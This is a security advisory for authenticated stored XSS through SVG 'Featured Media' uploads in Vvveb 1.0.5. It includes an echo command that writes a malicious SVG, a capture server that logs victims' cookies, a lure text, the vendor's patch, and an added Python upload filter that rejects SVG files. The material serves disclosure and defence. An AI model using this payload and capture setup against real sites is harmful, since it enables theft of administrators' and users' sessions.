Vvveb 1.0.5 | Authenticated Stored XSS on uploading image in posts & pages

Basic Information

Software Type: Web App
Software Name: Vvveb
Affected Version: 1.0.5
Software Vendor: Vvveb
Software Link: https://github.com/givanz/Vvveb
Severity: High
CVSS Score: 8.0
Affected Assets: 100+
Date of Discovery: Jan 3rd, 2025

Description

The post and page editors at /vadmin123/index.php?module=content/post&type=post and /vadmin123/index.php?module=content/post&type=page are vulnerable to stored XSS: an attacker can upload a malicious SVG file as the "Featured Media" of a post or page. The file is stored under /media/ and served back unchanged, so the payload runs when the image is opened directly in a new tab. That takes one click from the victim, but nothing warns them that the "image" carries active content.

Both editors are available to the editor role, so a low-privileged editor can plant a payload that steals the cookies of other users, site admins, other editors or even super admins.

Reproduce

To reproduce the issue, navigate to either of these endpoints to list posts or pages:
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

Edit a post or a page (the two flows are identical apart from the type):
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page

In the right sidebar, click "Featured Media" to upload a new image. Create the following SVG file:
echo '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300"><rect width="300" height="300" fill="red" /><text x="150" y="250" font-size="12" fill="white" text-anchor="middle" alignment-baseline="middle">Please open the image in a new tab to see it</text><image href="http://127.0.0.1:1718/capture.php" width="300" height="200" /></svg>' > payload.svg

Upload payload.svg and save the post.
To trigger the payload, open the image by its full path:
http://127.0.0.1/media//payload.svg

When the SVG is opened directly, the browser fetches the image URL embedded in it:
http://127.0.0.1:1718/capture.php

capture.php logs the requests it receives, including the cookies of logged-in users. The PHP file is available here:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Save it as capture.php and serve it with PHP's built-in web server:
php -S 0.0.0.0:1718

Additionally, the SVG can display a lure such as:
"Open this image in a new tab"

which entices users to open the image directly and trigger the payload.

Proof of Concept (PoC) Video

PoC Exploit

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Mitigation

Deny uploading SVG images altogether.

Patch

Vvveb added the svg extension to $uploadDenyExtensions for the media library and modal file upload.
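Added example, not Vvveb's code: a Python version of the upload gate that the mitigation and the patch describe. It denies the extension as the patch does, case-insensitively and for every dotted segment of the name, and additionally inspects the bytes, because an extension deny list is only as good as the server's extension-to-content-type mapping, whereas checking the bytes rejects an SVG document whatever it is called, including one gzipped as .svgz. The deny list, the helper names and the sample files are constructed for the example.

```python
#!/usr/bin/env python3
"""Added example, not Vvveb code: reject SVG uploads by extension (what the
patch does) and by content (defence in depth).  DENY_EXTENSIONS and the
sample inputs are assumptions of this example."""
import gzip
import re

DENY_EXTENSIONS = {"svg", "svgz"}        # minimal list for the example

# Optional BOM-free XML prolog, comments or DOCTYPE, then an <svg root element.
_SVG_ROOT = re.compile(
    rb"\A(?:\s|<\?xml[^>]*\?>|<!--.*?-->|<!DOCTYPE[^>]*>)*<svg[\s>/]",
    re.IGNORECASE | re.DOTALL,
)


def extensions_of(filename: str) -> list:
    """All dotted suffixes, lower-cased: 'Logo.SVG.png' -> ['svg', 'png']."""
    basename = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return [p.lower() for p in basename.split(".")[1:]]


def looks_like_svg(data: bytes) -> bool:
    """Content check independent of the file name or declared MIME type."""
    if data[:2] == b"\x1f\x8b":            # gzip magic: a renamed .svgz
        try:
            data = gzip.decompress(data)
        except (OSError, EOFError):
            return False
    if data.startswith(b"\xef\xbb\xbf"):   # strip a UTF-8 BOM
        data = data[3:]
    return _SVG_ROOT.match(data[:4096]) is not None


def check_upload(filename: str, data: bytes) -> tuple:
    """Return (allowed, reason).  Deny on any denied extension segment first,
    then on content, so 'image.png' holding SVG markup is still refused."""
    for ext in extensions_of(filename):
        if ext in DENY_EXTENSIONS:
            return False, f"extension .{ext} is denied"
    if looks_like_svg(data):
        return False, "content is an SVG document regardless of extension"
    return True, "ok"


# Constructed samples (not real uploads): a PNG header, an SVG with script
# hidden behind a prolog and comment, and the same SVG gzipped.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_SVG = (b"\xef\xbb\xbf<?xml version='1.0'?>\n<!-- looks harmless -->\n"
              b"<svg xmlns='http://www.w3.org/2000/svg'><script>1</script></svg>")
SAMPLE_SVGZ = gzip.compress(SAMPLE_SVG[3:])


if __name__ == "__main__":
    for name, blob in [("cat.png", SAMPLE_PNG), ("payload.svg", SAMPLE_SVG),
                       ("PAYLOAD.SVG", SAMPLE_SVG), ("payload.svg.png", SAMPLE_PNG),
                       ("payload.png", SAMPLE_SVG), ("payload.png", SAMPLE_SVGZ)]:
        print(f"{name:16} -> {check_upload(name, blob)}")
```

The extension check alone matches the shipped fix; the content check is the extra step to add if the media directory is served by a web server that picks the content type by extension, since any file the server labels image/svg+xml will be rendered, and any script inside it run, when opened directly.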



Posted on: January 10, 2025 10:48 PM